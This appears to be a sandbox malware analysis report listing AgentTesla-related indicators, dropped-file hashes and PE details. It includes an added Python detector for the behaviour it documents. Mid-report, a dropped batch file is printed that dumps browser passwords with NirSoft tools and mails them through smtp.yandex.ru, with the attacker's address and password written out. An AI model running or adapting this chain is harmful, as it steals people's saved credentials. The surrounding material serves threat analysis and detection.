 | Transferencias6231.vbs | malicious | AgentTesla, GuLoader | 77.88.21.158
 | Justificante de pago.vbs | malicious | AgentTesla, GuLoader | 77.88.21.158
 | Justificante de pago.vbs | malicious | AgentTesla, GuLoader | 77.88.21.158
 | TRANSFERENCIA BANCARIA.vbs | malicious | AgentTesla, GuLoader | 77.88.21.158
 | xBneIooWzQjjOOg.exe | malicious | AgentTesla | 77.88.21.158
 | Justificante_13087.vbe | malicious | AgentTesla, GuLoader | 77.88.21.158
 | ORDER FRANCAP.vbs | malicious | AgentTesla, GuLoader | 77.88.21.158
yandex.ru | Unit 2_week 4 2024.pptx | malicious | HTMLPhisher | 5.255.255.77
 | REQUEST FOR OFFER EQUIPMENT ORDER LIST.exe | malicious | AgentTesla | 77.88.21.158
 | https://vivantskincare.taplink.ws | malicious | HTMLPhisher | 93.158.134.119
 | DHL Delivery Invoice.com.exe | malicious | AgentTesla | 77.88.21.158
 | https://sites.google.com/view/we2k-/home | malicious | Unknown | 87.250.250.119
 | Cursor Commander.exe | malicious | Unknown | 213.180.204.90
 | http://jobs.sixlfags.com | malicious | Unknown | 87.250.250.119
 | http://gjchristelsodikobehjsg.taplink.ws | malicious | HTMLPhisher, Mamba2FA | 93.158.134.119
 | https://gjchristelsodikobehjsg.taplink.ws/ | malicious | HTMLPhisher, Mamba2FA | 93.158.134.119
Match | Associated Sample Name / URL | Detection | Threat Name | Context
YANDEXRU | Unit 2_week 4 2024.pptx | malicious | HTMLPhisher | 77.88.21.90
 | REQUEST FOR OFFER EQUIPMENT ORDER LIST.exe | malicious | AgentTesla | 77.88.21.158
 | https://vivantskincare.taplink.ws | malicious | HTMLPhisher | 93.158.134.119
 | DHL Delivery Invoice.com.exe | malicious | AgentTesla | 77.88.21.158
 | https://sites.google.com/view/we2k-/home | malicious | Unknown | 87.250.250.119
 | Cursor Commander.exe | malicious | Unknown | 213.180.204.90
 | SecuriteInfo.com.Win32.Application.Agent.NSIF6L.17895.28880.exe | malicious | Unknown | 213.180.193.14
 | SecuriteInfo.com.Win32.Application.Agent.NSIF6L.17895.28880.exe | malicious | Unknown | 213.180.204.196
 | http://jobs.sixlfags.com | malicious | Unknown | 87.250.251.119
                                      No context
                                      No context
                                      Process:C:\Users\user\Desktop\0zu73p2YBu.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                      Category:dropped
                                      Size (bytes):565760
                                      Entropy (8bit):7.907034199129241
                                      Encrypted:false
                                      SSDEEP:12288:C6ZBtrIcxL8ZizoPonO/wl7qA+Jlc2WacJohebJoSkJnkD1kdcQjtt:C6ZB/xLk/07qA+JzW6yskudcQjtt
                                      MD5:6867A307FDB19A4B89696F07FBFB1847
                                      SHA1:BB1ABEB88C33739D02DAEC2EEFD599F6DA33CEFF
                                      SHA-256:7D8DF3D56B4A1A412A8F3D234107417F0F48A48F84E84C43E9AA1D038E74E909
                                      SHA-512:D66199739159A428D0DDAF2EE6C783B9B458855128D2CA72CF46D95CDC6F000FA3A0B99A4D99894DD72D382CF8891A8CF8F6BE856B26075713AA1FA0CCE3FCB7
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Process:C:\Users\user\AppData\Local\Temp\ .exe
                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 600x399, components 3
                                      Category:dropped
                                      Size (bytes):163370
                                      Entropy (8bit):7.9765611413707935
                                      Encrypted:false
                                      SSDEEP:3072:Y42jCDwxUtsKh1rZ6qAee6mKz8+Mx2O0smXbBHRbjzeNdsz0ZkbTZ/OWo46:Y422DIUHTrZ7Axh+MHYBHRDuwJTDv6
                                      MD5:A24BC2D931B9A82E35F99E0B25730397
                                      SHA1:93736853CE4454323C79B25736D42055BB7DCDA4
                                      SHA-256:1C406A29734C76680E1595BE98BE04FFDC45958E9F488A1FD5090A1457F7711F
                                      SHA-512:77C0F2C8D9DC628DBC64F0DB4D4F091348730DA7707928EADDCEDFA1DFCC3E879B8840C1A5F68CA94ECCA19A22C27402D4A4D8ECE54E1900995B839EA2034078
                                      Malicious:false
                                      Process:C:\Users\user\AppData\Local\Temp\ .exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                      Category:dropped
                                      Size (bytes):130048
                                      Entropy (8bit):7.816255678628108
                                      Encrypted:false
                                      SSDEEP:3072:6agzIyK7evSGkFFam+eis+np3Dq/snVXQnm:6agzIyinLORpO/GVX
                                      MD5:CB271441FA19AC163ECF380C8EBB3109
                                      SHA1:2746EC2F9B03C814CB6DCDF98CD34E5581322239
                                      SHA-256:ABCA78E9E323C83DDA09AFBA29A2CD76846871546959541BFF51EB4AFA1AC499
                                      SHA-512:844CA33B863E925E31A077D04ED6D2DABBCEB4A7DE7D35CC23C42E835CB72B4FA28C170FB78B8BFE75BA7FCD47DA6DDFC5894A687C0095F3AD8EE2B80769A603
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 61%
                                      Process:C:\Users\user\AppData\Local\Temp\600.tmp\ChromePass.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                      Category:dropped
                                      Size (bytes):2
                                      Entropy (8bit):1.0
                                      Encrypted:false
                                      SSDEEP:3:Qn:Qn
                                      MD5:F3B25701FE362EC84616A93A45CE9998
                                      SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                      SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                      SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                      Malicious:false
                                      Preview:..
                                      Process:C:\Users\user\AppData\Local\Temp\600.tmp\OperaPassView.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                      Category:dropped
                                      Size (bytes):2
                                      Entropy (8bit):1.0
                                      Encrypted:false
                                      SSDEEP:3:Qn:Qn
                                      MD5:F3B25701FE362EC84616A93A45CE9998
                                      SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                      SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                      SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                      Malicious:false
                                      Preview:..
                                      Process:C:\Users\user\AppData\Local\Temp\600.tmp\PasswordFox.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                      Category:dropped
                                      Size (bytes):2
                                      Entropy (8bit):1.0
                                      Encrypted:false
                                      SSDEEP:3:Qn:Qn
                                      MD5:F3B25701FE362EC84616A93A45CE9998
                                      SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                      SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                      SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                      Malicious:false
                                      Preview:..
                                      Process:C:\Users\user\AppData\Local\Temp\ .exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                      Category:dropped
                                      Size (bytes):40448
                                      Entropy (8bit):7.480459783551601
                                      Encrypted:false
                                      SSDEEP:768:L2ivyslykfdDY/D16P71WO9xyOMEdSv2mtAl4B6FEfP0JtyEECLvxYZqw:ii6q5dE/Kj/5iUJDglqw
                                      MD5:8B4AE559AD7836B27EE9F8F171BE8139
                                      SHA1:C60DDCFC7B3954F4D0D515B1FDAF47C6999E50A4
                                      SHA-256:1130504F6095D2B09FB1AD39323AB9448798B41EB925539E2128160CEC106609
                                      SHA-512:DF13AE1AA3B481D1A819736AF6DBF5FEA5C930A1FE18EA0368A0D2EFBE20334626DD90B42757BF8EF080F229E502C97CD6F5173738BC4967E26A04AEE61C040B
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 61%
                                      Process:C:\Users\user\AppData\Local\Temp\ .exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                      Category:dropped
                                      Size (bytes):39424
                                      Entropy (8bit):7.512783120236899
                                      Encrypted:false
                                      SSDEEP:768:89taRejmNH/Qjvgmj84TOjlRS6StB+PJP66Dh+lBvt1WChyen:82wMfQ1LKLE4y6WpbWChye
                                      MD5:CC84065F23CFC3D980AAD38EFC648DE6
                                      SHA1:C984A4FE5066440C17CE124BC65CC9152803C274
                                      SHA-256:2EB8BE8484421F65BB26FDAE80E2ED2721E2CC8C4996BE73158F46A6BDE57E22
                                      SHA-512:2920D4444F243AEAABCD360F71C794EDDEF1FCB1A5D487F46267F5DFD1BA319115E2FD4E80CEB79BBD51A03981F6ECA079349D90042EC7A2DF4CDA862CB69F01
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 76%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......l...(.y.(.y.(.y...&.*.y...$.8.y...9.+.y...e.#.y.(.x.,.y...`.+.y.....4.y.....).y.....).y.Rich(.y.........................PE..L.....ZM..................... ......Ph.......p....@.............................................................................8....p..............................................................................................................UPX0....................................UPX1.............z..................@....rsrc.... ...p.......~..............@......................................................................................................................................................................................................................................................................................................................................................................................3.03.UPX!....
                                      Process:C:\Users\user\AppData\Local\Temp\ .exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):122880
                                      Entropy (8bit):6.537396945447993
                                      Encrypted:false
                                      SSDEEP:3072:tN3YqC7ZpufmsbSB0RaZCdLkMzdTv/3qq1iica:tN3Yq4ZpAPeB0fkMzgGHh
                                      MD5:724CAE63522F6E5F7565A3BF4B2A719B
                                      SHA1:18620DBD4357D85918070F669FF4B61755290757
                                      SHA-256:B87814EAF1CD5268E797F1119B58E3FD79381AF3F530BE9A90993198CBCE1779
                                      SHA-512:AF68749CADF9920A8BED455A2557B1FAF475D30FDD62F45DA6757FBC5A59341FFFECCCA4FF646B334DA95CF673DEEEEA74BDBB27A16F510A4E3309055F89817D
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........K...%E..%E..%E..xE..%E<.xE..%E..$E.%EW.!E..%EW..E..%EW./E..%E<.+E..%E..zE..%E..EE..%E..yE..%ES.{E..%E...E..%ERich..%E................PE..L......E...........!.........F.......#.......0......................................................................`...v...4...x....`.......................p.......................................................0...............................text............................... ..`.rdata...|...0...~... ..............@..@.data...............................@....rsrc........`......................@..@.reloc..$....p......................@..B................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\ .exe
                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):115200
                                      Entropy (8bit):6.382552176662548
                                      Encrypted:false
                                      SSDEEP:3072:ag5DTZCatGyIMzdze3BO+ggUFLVRM8uTv/3hH4:zDTZCatGyI+dze3BNgpVRM8+H
                                      MD5:31F84E433E8D1865E322998A41E6D90E
                                      SHA1:CBEA6CDA10DB869636F57B1CFFAD39B22E6F7F17
                                      SHA-256:AECA4A77D617DA84296B5F857B2821333FE4B9663E8DF74EF5A25A7882693E5E
                                      SHA-512:7AE504723B5B140E45AF3163D1BFDC5EE0497DEBAFBA07CFBF1D2C15147C000BE53F4AC8D36D926ED11CF0BB62E9E72F9BCF5D4CAF92AA732D942F55834E2BE9
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 8%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q..5..T5..T5..T&..T7..T...T3..T5..TL..T..T6..T..T4..T...T7..T..T>..T0..T4..T0..T&..T..T4..T0..T4..TRich5..T................PE..L......E.....................(.......".......0....@..........................p..............................................l...x....`..(............................................................................0...............................text............................... ..`.rdata..h}...0...~... ..............@..@.data..............................@....rsrc...(....`......................@..@................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\ .exe
                                      File Type:current ar archive
                                      Category:dropped
                                      Size (bytes):2174
                                      Entropy (8bit):4.670703997043367
                                      Encrypted:false
                                      SSDEEP:48:Rq3SAQJbl/zKKOyAO5Ds3KAs0aUKsRXRqjzq:FKcCKGKuham
                                      MD5:3CD3CFFDA2B5108E2778F94429C624D6
                                      SHA1:3E4D218D1B8EB4FA1AB5152B126951892AFF3DC9
                                      SHA-256:B545194041588FC0A6F57E7EB5A93D2418AAA263D246E3C696A79EE5859770FF
                                      SHA-512:C80080AFCC982C4E950876756FB32C7F24FBE45BFBBE78AFE144BE1EDE86DC9EF1E57DB95D3DF7F4C6011FD226F23684B929781B55D1BE659CFA75D14F8D0C79
                                      Malicious:false
                                      Preview:!<arch>./ 1172423196 0 222 `........N...n.......R...R........................__IMPORT_DESCRIPTOR_BLAT.__NULL_IMPORT_DESCRIPTOR..BLAT_NULL_THUNK_DATA._Send@4.__imp__Send@4._Blat@8.__imp__Blat@8._SetPrintFunc@4.__imp__SetPrintFunc@4.__imp__cSend._cSend./ 1172423196 0 240 `.....N...n.......R................................................._Blat@8._Send@4._SetPrintFunc@4.__IMPORT_DESCRIPTOR_BLAT.__NULL_IMPORT_DESCRIPTOR.__imp__Blat@8.__imp__Send@4.__imp__SetPrintFunc@4.__imp__cSend._cSend..BLAT_NULL_THUNK_DATA.BLAT.dll/ 1172423196 0 483 `.L......E.............debug$S........?...................@..B.idata$2............................@.0..idata$6............................@. ..............BLAT.dll(......................Microsoft (R) LINK...................................................BLAT.dll..@comp.id..]..........................idata$2@.......h..idata$6...........idata$4@......
                                      Process:C:\Users\user\AppData\Local\Temp\ .exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                      Category:dropped
                                      Size (bytes):44544
                                      Entropy (8bit):7.580825428946343
                                      Encrypted:false
                                      SSDEEP:768:TI/86WM0Rk9UXwYlX154ozTouldUZlhPOH6lvXsV:uKkKgYlXck075POaVXsV
                                      MD5:C861FE184E271D6E2BA958DA306BA748
                                      SHA1:B039E4D8E70261DFDF8EE521DCBC3E04348423A5
                                      SHA-256:F8A112B0D1CE4142E4D69CADFC2748C27026B491532FBA18D9160F7EB48B4886
                                      SHA-512:EA127EAA149B5FF1B1F1DE3891563B2E064E043F03E48CA298D3539E1F572297ABD4EFD951021372BA0090B8C30C06E7D144BEC6D9828A5CC08A644155A8F3CE
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 71%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........:..[..[..[..Ax..[..ax..[..Ax..[..xT..[..[..Z....[....[....[..Rich.[..........PE..L...;.)M..................... ......p.............@.............................................................................8...................................................................................................................UPX0....................................UPX1................................@....rsrc.... ..........................@..............................................................................................................................................................................................................................................................................................................................................................................................................3.03.UPX!....
                                      Process:C:\Users\user\AppData\Local\Temp\ .exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1272
                                      Entropy (8bit):5.031296977639238
                                      Encrypted:false
                                      SSDEEP:24:1hpvjh1jh1dVjhvuSgoHU5hrgXQ5k6gO4dqfgP5kss3d+:1Lj7jrj1uSrsDn65z
                                      MD5:C328282B75C4BDFF5E7F3E1C7F4C64D4
                                      SHA1:676C48A4407CC752FB84C91CCFF147EF5E82B94B
                                      SHA-256:B899DA4A716D950F5ADCF06401CE2D519EB34BD16D72862766717BDF27E64F03
                                      SHA-512:DA0C42B18A73A1B6C85D56CCA1D4E0D9C40E9051C58DB3859166939E813245A9678DECB29F405974571A9C9AD38594421BF2EB604128F460F3F54FCC84809683
                                      Malicious:false
                                       Preview (CRLF line breaks restored; the preview is truncated at the end):
                                       @echo off
                                       
                                       start 1.jpg
                                       ping -n 3 127.0.0.1 > nul
                                       start OperaPassView.exe /stext %computername%_OperaPassView.txt
                                       ping -n 3 127.0.0.1 > nul
                                       start PasswordFox.exe /stext %computername%_PasswordFox.txt
                                       ping -n 3 127.0.0.1 > nul
                                       start iepv.exe /stext %computername%_iepv.txt
                                       ping -n 3 127.0.0.1 > nul
                                       start ChromePass.exe /stext %computername%_ChromePass.txt
                                       
                                       
                                       ping -n 120 127.0.0.1 > nul
                                       
                                       blat.exe -install -server smtp.yandex.ru -port 587 -f alexandrKondratiev5@yandex.ru -u alexandrKondratiev5 -pw qwerty5
                                       ping -n 3 127.0.0.1 > nul
                                       blat.exe -to alexandrKondratiev5@yandex.ru -subject "Opera" -attachi "%computername%_OperaPassView.txt" -body "Opera"
                                       ping -n 3 127.0.0.1 > nul
                                       blat.exe -to alexandrKondratiev5@yandex.ru -subject "Fox" -attachi "%computername%_PasswordFox.txt" -body "Fox"
                                       ping -n 3 127.0.0.1 > nul
                                       blat.exe -to alexandrKondratiev5@yandex.ru -subject "ie" -attachi "%computername%_iepv.txt" -body "ie"
                                       ping -n 3 127.0.0.1 > nul
                                       blat.exe -to alexandrKondratiev5@ya
                                      Process:C:\Users\user\AppData\Local\Temp\600.tmp\blat.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):490
                                      Entropy (8bit):5.042252623136629
                                      Encrypted:false
                                      SSDEEP:12:MYBqKY+H2l28apN/aKM77fEN5sKN5ssWLtE:9BG/o8an/Ov05sy5ssWLq
                                      MD5:0F56F90F3D9AC56D6003C23F7032D084
                                      SHA1:5F83DBCC43259F0AD5B9E235988DCFFAFCF5F8C4
                                      SHA-256:46775236B9DE29CF92B0C51F5BACD4B2C1567DD1D29C3446D20994CBCB0D4DF5
                                      SHA-512:E77832AF1322F25E16ABB7B3CD2B3D503CE7F7BB678CDAD36C53264CDB63287FB2E520019E987B30033EECA90F58414627812C190108AB02150C1B476406AB4D
                                      Malicious:false
                                       Preview (CRLF line breaks restored):
                                       Blat v2.6.2 w/GSS encryption (build : Feb 25 2007 12:06:19)
                                       
                                       Sending stdin.txt to alexandrKondratiev5@yandex.ru
                                       Subject: Chrome
                                       Login name is alexandrKondratiev5@yandex.ru
                                       Attached text file: user-PC_ChromePass.txt
                                       The SMTP server did not accept Auth PLAIN value.
                                       Are your login userid and password correct?
                                       The SMTP server does not require AUTH LOGIN.
                                       Are you sure server supports AUTH?
                                       The SMTP server does not like the sender name.
                                       Have you set your mail address correctly?
                                      Process:C:\Windows\SysWOW64\PING.EXE
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):380
                                      Entropy (8bit):4.937448817509359
                                      Encrypted:false
                                      SSDEEP:6:PzLSLzMRfmWxHLThx2LThx2LThx0sW26wGv+wAFeMmvVOIHJFxMVlmJHaVFEG1vv:PKMRJpTeTeT0sKvtAFSkIrxMVlmJHaVz
                                      MD5:63A3D026F6E4381585F5AEFACE172263
                                      SHA1:3EA8FDD98AA9F20167008F57DAA6F8ED3ECA9738
                                      SHA-256:4C31393CE8AE5EA969A049B3FF5DD0EA18E6C29E0E59841BEC1D7AFB7C64DE4C
                                      SHA-512:FB88787000A6D258A1E3AAB97C46B8D92E68071B8E55C8F98278CB474AE6AFB31256A58BF198132D251F8EC666F28C085A88A103C8DB029B3B188F77163BE793
                                      Malicious:false
                                       Preview (CRLF line breaks restored):
                                       
                                       Pinging 127.0.0.1 with 32 bytes of data:
                                       Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
                                       Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
                                       Reply from 127.0.0.1: bytes=32 time<1ms TTL=128
                                       
                                       Ping statistics for 127.0.0.1:
                                           Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),
                                       Approximate round trip times in milli-seconds:
                                           Minimum = 0ms, Maximum = 0ms, Average = 0ms
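The dropped batch file above is the whole attack chain: "ping -n N 127.0.0.1 > nul" is used purely as a sleep, four NirSoft-style password-recovery tools are started with /stext to dump browser credentials into %computername%_*.txt files, and blat.exe first stages the SMTP server and credentials with -install and then mails each dump as an attachment over port 587 (the blat log above shows the server rejecting AUTH PLAIN, so the sends failed in this run). The detection logic below is an added example and is not part of the Joe Sandbox report. It runs over constructed Sysmon-style process-creation events modelled on that batch file; the SMTP server, sender address and password in the sample events are placeholders, not the values in the report, and "user-PC" stands in for %computername%. Sysmon records the child's command line after cmd.exe has consumed the "> nul" redirection, so the ping pattern is matched without it.

```python
import re
from collections import defaultdict

# Constructed Sysmon-style process-creation events (ParentImage, Image, CommandLine) modelled
# on the dropped batch file. They are NOT real log lines: the SMTP server, sender and
# password are placeholders, and "user-PC" stands in for %computername%.
CMD = "C:\\Windows\\SysWOW64\\cmd.exe"
PING = "C:\\Windows\\SysWOW64\\PING.EXE"
TMP = "C:\\Users\\user\\AppData\\Local\\Temp\\600.tmp\\"
SAMPLE_EVENTS = [
    (CMD, PING, "ping -n 3 127.0.0.1"),          # cmd.exe consumed the "> nul" redirection
    (CMD, TMP + "OperaPassView.exe", "OperaPassView.exe /stext user-PC_OperaPassView.txt"),
    (CMD, PING, "ping -n 3 127.0.0.1"),
    (CMD, TMP + "PasswordFox.exe", "PasswordFox.exe /stext user-PC_PasswordFox.txt"),
    (CMD, PING, "ping -n 3 127.0.0.1"),
    (CMD, TMP + "iepv.exe", "iepv.exe /stext user-PC_iepv.txt"),
    (CMD, PING, "ping -n 3 127.0.0.1"),
    (CMD, TMP + "ChromePass.exe", "ChromePass.exe /stext user-PC_ChromePass.txt"),
    (CMD, PING, "ping -n 120 127.0.0.1"),
    (CMD, TMP + "blat.exe", "blat.exe -install -server smtp.example.net -port 587 "
                            "-f sender@example.net -u sender -pw Passw0rd"),
    (CMD, TMP + "blat.exe", 'blat.exe -to sender@example.net -subject "Opera" '
                            '-attachi "user-PC_OperaPassView.txt" -body "Opera"'),
    (CMD, TMP + "blat.exe", 'blat.exe -to sender@example.net -subject "Chrome" '
                            '-attachi "user-PC_ChromePass.txt" -body "Chrome"'),
    # benign noise that must not fire
    ("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\PING.EXE", "ping -n 4 10.0.0.1"),
    ("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\notepad.exe", "notepad.exe notes.txt"),
]

# ping -n N against loopback: ping waits ~1 s between echo requests, so this sleeps about N-1 s.
PING_SLEEP = re.compile(r"^\s*ping(?:\.exe)?\s+-n\s+(\d+)\s+(?:127\.0\.0\.1|localhost)\s*$", re.I)
# NirSoft "save as text" switch; the output file name is what gets exfiltrated later.
STEXT = re.compile(r"/stext\s+\"?([^\s\"]+)", re.I)
# blat -install stores the SMTP server and credentials for later sends.
BLAT_INSTALL = re.compile(r"-install\b.*?-server\s+(\S+).*?-pw\s+\S+", re.I)
# blat attachment switches: -attach, -attacht, -attachi, -attachb
BLAT_ATTACH = re.compile(r"-attach[tib]?\s+\"?([^\s\"]+)", re.I)


def analyze(events):
    """Correlate ping-sleep, NirSoft /stext dumps and blat mail sends across process events."""
    ping_counts = defaultdict(list)   # parent image -> list of -n values
    stext_outputs = {}                # output file (lower-case) -> tool image name
    smtp_servers = []
    attached = []
    for parent, image, cmdline in events:
        exe = image.rsplit("\\", 1)[-1].lower()
        if exe == "ping.exe":
            m = PING_SLEEP.match(cmdline)
            if m:
                ping_counts[parent].append(int(m.group(1)))
            continue
        m = STEXT.search(cmdline)
        if m:
            stext_outputs[m.group(1).lower()] = exe
        if exe == "blat.exe":
            m = BLAT_INSTALL.search(cmdline)
            if m:
                smtp_servers.append(m.group(1))
            attached.extend(a.lower() for a in BLAT_ATTACH.findall(cmdline))

    # Three or more loopback pings under one parent is a sleep loop, not connectivity testing.
    ping_n_total_by_parent = {p: sum(n) for p, n in ping_counts.items() if len(n) >= 3}
    exfiltrated = [f for f in attached if f in stext_outputs]

    findings = []
    if ping_n_total_by_parent:
        findings.append("ping_sleep_loop")
    if stext_outputs:
        findings.append("nirsoft_stext_dump")
    if smtp_servers:
        findings.append("blat_smtp_credentials_staged")
    if exfiltrated:
        findings.append("stext_output_mailed")
    if {"nirsoft_stext_dump", "stext_output_mailed"} <= set(findings):
        verdict = "browser credential dump mailed out via SMTP"
    elif findings:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {
        "findings": findings,
        "ping_n_total_by_parent": ping_n_total_by_parent,
        "stext_outputs": stext_outputs,
        "smtp_servers": smtp_servers,
        "exfiltrated_files": exfiltrated,
        "verdict": verdict,
    }


if __name__ == "__main__":
    import json
    print(json.dumps(analyze(SAMPLE_EVENTS), indent=2))
```

The correlation is what makes this worth more than three separate string matches: a lone /stext run is something an administrator might do, and blat is a legitimate mailer, but an attachment whose name equals a file produced by an /stext run under the same parent, bracketed by loopback pings, is the exact shape of this sample. On real telemetry, replace SAMPLE_EVENTS with (ParentImage, Image, CommandLine) tuples from Sysmon event ID 1 or Windows event ID 4688 with command-line auditing enabled.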
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):7.912537280939596
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.94%
                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • VXD Driver (31/22) 0.00%
                                      File name:0zu73p2YBu.exe
                                      File size:642'048 bytes
                                      MD5:29eca65ffa92a3f877b59df42e2150ed
                                      SHA1:df50e54f9a2b5b6b8831a1e967fba1292ef31790
                                      SHA256:01356f359af7ecda0db1b00ebcb7bc844ce1fb36bbdbf812bf4a749c22f0d620
                                      SHA512:5f14f26c54a5f2f9fcbe2d4de9fb35cc32e1f82f42d8ae9f22d5f9cc8180fc210301b08cb661e424e65bfb0968ef6534f09d8bd5deee284e3e776a830c4709e5
                                      SSDEEP:12288:BJnkD1kdcQjttsMFVpIDd0xoBBxBLCmbyjSzHIYJ5gfnOKVjwboNsgB:vkudcQjttdV0d0GBBxVrujSzoYIrjwbE
                                      TLSH:CAD402C3E8952FF8D62FC8B7764A40438D71F491179863B1779E8EA310E540792BBA8D
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....D.N..................................... ....@........................................................................
                                      Icon Hash:f3c74d49ca4e6e7c
                                      Entrypoint:0x401ad8
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                      DLL Characteristics:
                                      Time Stamp:0x4EB8440D [Mon Nov 7 20:48:13 2011 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:94400fe3e62cd2376124312fe435b8e4
                                      Instruction
                                      call 00007F1655231698h
                                      mov dword ptr [0040300Bh], eax
                                      push 00000000h
                                      call 00007F16552316A4h
                                      mov dword ptr [00403013h], eax
                                      call 00007F16552316A6h
                                      mov dword ptr [00410670h], eax
                                      push 0000000Ah
                                      push dword ptr [0040300Bh]
                                      push 00000000h
                                      push dword ptr [00403013h]
                                      call 00007F1655230AE8h
                                      push 00000000h
                                      call 00007F165523164Fh
                                      jmp dword ptr [004020B4h]
                                      jmp dword ptr [004020B0h]
                                      jmp dword ptr [004020ACh]
                                      jmp dword ptr [004020A8h]
                                      jmp dword ptr [004020A4h]
                                      jmp dword ptr [004020A0h]
                                      jmp dword ptr [0040209Ch]
                                      jmp dword ptr [00402098h]
                                      jmp dword ptr [00402094h]
                                      jmp dword ptr [00402090h]
                                      jmp dword ptr [0040208Ch]
                                      jmp dword ptr [00402088h]
                                      jmp dword ptr [00402084h]
                                      jmp dword ptr [00402034h]
                                      jmp dword ptr [00402038h]
                                      jmp dword ptr [0040203Ch]
                                      jmp dword ptr [00402040h]
                                      jmp dword ptr [00402044h]
                                      jmp dword ptr [00402048h]
                                      jmp dword ptr [0040204Ch]
                                      jmp dword ptr [00402050h]
                                      jmp dword ptr [00402054h]
                                      jmp dword ptr [00402000h]
                                      jmp dword ptr [00000000h]
                                       Name                                  Virtual Address  Virtual Size  Is in Section
                                       IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                       IMAGE_DIRECTORY_ENTRY_IMPORT          0x20bc           0x50          .rdata
                                       IMAGE_DIRECTORY_ENTRY_RESOURCE        0x11000          0x9ace0       .rsrc
                                       IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                       IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                       IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
                                       IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                       IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                       IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                       IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                       IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
